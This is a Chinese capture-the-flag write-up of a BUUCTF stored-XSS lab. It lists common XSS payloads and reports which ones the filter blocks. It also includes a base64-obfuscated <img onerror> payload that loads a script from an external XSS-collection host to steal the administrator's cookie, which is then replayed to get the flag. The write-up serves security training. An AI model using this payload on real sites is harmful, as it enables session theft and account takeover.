61,【1】BUUCTF WEB BUU XSS COURSE 11

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

常见的xss payload如下:

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

相关推荐
悟能不能悟15 小时前
js闭包问题
开发语言·前端·javascript
秋秋_瑶瑶15 小时前
vue-amap组件呈现的效果图如何截图
前端·javascript·vue-amap
阿里小阿希15 小时前
Vue3 + Element Plus 项目中日期时间处理的最佳实践与数据库设计规范
数据库·设计规范
白鹭16 小时前
MySQL源码部署(rhel7)
数据库·mysql
666和77717 小时前
Struts2 工作总结
java·数据库
gnip17 小时前
js上下文
前端·javascript
还听珊瑚海吗17 小时前
SpringMVC(一)
数据库
中草药z17 小时前
【Stream API】高效简化集合处理
java·前端·javascript·stream·parallelstream·并行流
不知名raver(学python版)17 小时前
npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR!
前端·npm·node.js